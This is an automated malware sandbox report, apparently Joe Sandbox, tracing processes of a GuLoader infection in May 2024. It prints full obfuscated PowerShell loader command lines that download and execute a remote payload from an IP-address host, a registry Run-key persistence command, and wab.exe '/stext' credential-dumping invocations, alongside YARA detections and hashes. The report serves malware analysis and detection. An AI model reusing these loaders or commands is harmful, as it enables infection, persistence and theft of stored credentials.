Teata.tiftbBomberKemikiPrstakBr,mlk Tr,aeBatchnS.ant)Chaus ');Caprellidae (Sortkridtstegningens ' Frem$N,llegDif elJermaoCruncbMotifaExhe lUpr.o: UnexA inglrTemalbCaliceOver jPrintdKo,resForreg Faldi.lerbvSki deK lorrCustof,pgefoTr,nkrbagnie .eopn Rasti ,raanMono gKolersGes,a=Balla$ In.iiTastarBriocrF rieeAsbolsPara,tSapotrSpeciaSama,i TyttnMa.blaRafflbNosomlforgry Vari.MarhesShalluRammeb t,les Ci atSpousrTryk i P.rfnSty.sgSer.a(Flypa$GavntEMulisxUndera Set l Car tAri,teVektoef,ust,sjlea$ septU Scism Phaey Odo,nWaketd G.ati LedegNati.eYaupos Ag i)Juice ');Caprellidae $Arbejdsgiverforenings;"
                              Imagebase:0x7ff6e3d50000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:02:09:01
                              Start date:31/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:02:09:04
                              Start date:31/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"
                              Imagebase:0x7ff7458b0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:02:09:10
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. 
Ph lHSag,regenteaC erudNdlideSt.ncrRv kasDea,l[Zoo o$S,gmoLVerbar pollrRublae C.pudgarvesVenstk TresjKrabao leazlNongae SandrSpisenBrysteTar.isAnska]Socia=.mfan$jail,fTykneeL gmesKv knt Rosed Brisr Alena Ver gunpurt Urlie EnvonS,rafs Uvil ');$Laserjet=Sortkridtstegningens 'Indri$BegohSO.herkSansei EnerfS eketExigeeFlasktMonar1Tilba4 .isk.reconDStratowaff w HermnUdspilp,lygoAng.va BunddmirisFA.glui .otolAwesoe igh(Numis$T,gvohFrimey.dninp Embre S,earGood.mBinnon redeeHestesSkovtiAdopta Alte,Trudy$ AbonA.uggslOmnivmpomo,eIndlanIscenvSti.leinkublNapht)Ggede ';$Almenvel=$Ruinhobens[0];Caprellidae (Sortkridtstegningens 'Resin$ Praeg enstlZechsoMisseb E.deaPreanlAmtsv:LacriS Rottk NatiiSkalklHedipd EquipSt,pua Afsld DiscdAn,iteFryserHomoonGo.rie .ela2 Ph l4 O te9Sitzy=Grund(.odtgTKill eFro tsSyllitDisci-Prep,PKri.saSemiptSubvehPassi Forsl$CanccAOverml GamamNath eOrdgynFunktvSma.seKultul,dled) Bra. ');while (!$Skildpadderne249) {Caprellidae (Sortkridtstegningens 'Forha$SedergRev llOsciloAngakbKamgaaPa irlTaggy:TrappMChessoGatchlAntagdfugtsaHyttevkrickiKulsotAnskueamput=.kyph$.abent TranrDanseuA.kaneAller ') ;Caprellidae $Laserjet;Caprellidae (Sortkridtstegningens 'UpthrS isaptFlsk.aBrillrUdbldtVareb-Dest SKaut lslagteUpaakeInsinpFirep a bum4 Bund ');Caprellidae (Sortkridtstegningens '.etsp$WheregGaleolOdyssoBan bbJo,ana sy elUnsta:opgivS SspekFl eribigb,lM jusdAssaup.vmmea Sc,nd nterd Nonpe P,llrO hobnAsconemacul2Randy4F.yve9Phone=Blond(WaggoTMo,ioeBlancsChichtplumb- ArbePPreadaUnirrtTinfohK,lon Paras$ColeoAKamg.l Hor mAd neekom.dnOvercvLatcheStatelNo,co)Venog ') ;Caprellidae (Sortkridtstegningens ' Menu$kbarsgSolcrlGad toTecasb Tag aMortalFlues:TestaUInterdWavineUncurnBroded,tochr.errgsBarysa bl lr RaadbPrebeegillsjHaem,dSangleHydat= kand$KroatgGangblAnaxto GridbKonk aSko.glProto:SnitzlArgotyToldea Bra.nCredicW.lloeslalo+Phane+Ubetn%Grx,a$Term.GSengiyTilbarInforoAdenosl thocSvineobantip,ilatiRubbec Ch,k.MarkscHidrooFre.ru daninGalentUnhoo ') 
;$hypermnesia=$Gyroscopic[$Udendrsarbejde];}$Exaltee=316524;$Umyndiges=29862;Caprellidae (Sortkridtstegningens 'F.rme$ F.digBu del FremoHa.tebCellea Rovil.ileu: offiJProh.eForfrdfun.teExpun T,ops=repai OutpGMyoseeBeskytF,rkl-indusCFraado Gul.nObsert Un,eeHe atnUslintSprin Pend$ andAHy,solkomp.mSku,geDumphnSnusevM trie.estilKrist ');Caprellidae (Sortkridtstegningens 'Trlkv$ Ov rgFi,zelintrooUtaalbbenigaYawpelNveny:kerateFedertHypereL vsar bsecn,hodei,lgest.achifStrygaLandsbIrrevrAlbueiThermkGo,dak.ersoeProspn I.ds Upisl=Unter .acop[ Bo bSHusary A chsGracitHamareExonem Slut.RaesoCAveceoB,mstn indev triueT,ldnrPre it Klas]Regi.:Stamb:IrratFIntr rForbloIotizmAllerBTfleda Unbastrafie,prin6Reduk4ReverS PsamtO erlrc.imbiWashbnAttrig lowe(Choke$Ram.iJS.anse RygedB weaeMagda)Store ');Caprellidae (Sortkridtstegningens ' ,ant$SeelfgSta,glL ndmoSta.abPhonoaA.lbelNi ot:k.rtoi ,nterRep.srUnclaehasles,oloutBlomsrspildaTeleoiLimnonE.ikka Nyl.bsuppolBevogyReve Ideli=Thyro Sy te[L,atuSTestuyasilisJona tTalkieSkarpmC.she. WaggT Serie MajoxUnasstRea,d.TrianEUdvikn Bi lc ForsoFremtdVicefiUdko.nParalgDati,]Udstd:S art:Cari,A Cen.SRy.keCal,enIFuldsISlide.B reaGFoto eDomintsprjtSUnthitSnowbrGunati DynenFevergInd k( Ting$ShavueRetrotUkurae VarmrAdlesnbarneiDan.rt Tetrf Teata.tiftbBomberKemikiPrstakBr,mlk Tr,aeBatchnS.ant)Chaus ');Caprellidae (Sortkridtstegningens ' Frem$N,llegDif elJermaoCruncbMotifaExhe lUpr.o: UnexA inglrTemalbCaliceOver jPrintdKo,resForreg Faldi.lerbvSki deK lorrCustof,pgefoTr,nkrbagnie .eopn Rasti ,raanMono gKolersGes,a=Balla$ In.iiTastarBriocrF rieeAsbolsPara,tSapotrSpeciaSama,i TyttnMa.blaRafflbNosomlforgry Vari.MarhesShalluRammeb t,les Ci atSpousrTryk i P.rfnSty.sgSer.a(Flypa$GavntEMulisxUndera Set l Car tAri,teVektoef,ust,sjlea$ septU Scism Phaey Odo,nWaketd G.ati LedegNati.eYaupos Ag i)Juice ');Caprellidae $Arbejdsgiverforenings;"
                              Imagebase:0xaf0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2508655115.00000000085D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2511671395.000000000A87F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:02:09:11
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:02:09:20
                              Start date:31/05/2024
                              Path:C:\Windows\System32\dllhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                              Imagebase:0x7ff642ec0000
                              File size:21'312 bytes
                              MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:11
                              Start time:02:09:28
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.3408936789.000000000486F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false

                              Target ID:13
                              Start time:02:09:34
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:14
                              Start time:02:09:34
                              Start date:31/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:15
                              Start time:02:09:34
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\reg.exe
                              Wow64 process (32bit):true
                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
                              Imagebase:0xa00000
                              File size:59'392 bytes
                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:16
                              Start time:02:09:39
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ypvrsbyzkda"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:17
                              Start time:02:09:40
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jrikttjaylsubj"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:02:09:40
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tlouumuumtkhdxgwj"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:02:09:40
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs"
                              Imagebase:0x6f0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:02:09:41
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado 
S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. 
Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;"
                              Imagebase:0xaf0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000014.00000002.3371615882.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Target ID:21
                              Start time:02:09:41
                              Start date:31/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:22
                              Start time:02:09:42
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:02:09:49
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso 